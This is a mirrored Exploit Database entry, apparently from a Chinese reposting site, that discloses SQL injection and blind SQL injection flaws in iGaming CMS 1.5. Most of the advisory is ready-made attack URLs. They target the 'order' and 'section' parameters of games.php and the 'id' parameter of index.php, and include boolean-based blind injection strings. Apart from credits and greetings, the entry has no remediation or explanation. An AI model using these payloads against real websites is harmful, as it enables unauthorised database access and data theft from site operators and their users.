iGaming CMS – Multiple SQL Injections

• Exploit Database
• 132 阅读

• 作者： Sweet
  日期： 2010-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14820/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  ############################################################################ ## # Exploit Title: iGamingCMS1.5 multiple vulnirabilities# ## # Date: 27/08/2010 # ## # Author: Sweet# ## # Contact : charif38@hotmail.fr# ## # Software Link: http://www.igamingcms.com/# ## # Download: http://forums.igamingcms.com/forumdisplay.php?f=5# ## # Version:1.5# ## # Tested on: WinXp sp3 # ## # Risk : hight # ## ## # Description : iGaming CMS is a content management# # system designed for gaming websites. # ## ## ## ############################################################################   1-SQL injection:   http://www.example.com/igamingpath/games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc   2-Blind injection:   http://www.example.com/igamingpath/games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc   http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0     thx to Milw0rm.com , JF - Hamst0r - Keystroke, inj3ct0r.com , exploit-db.com   Saha Ftourkoum et 1,2,3 viva L'Algerie :))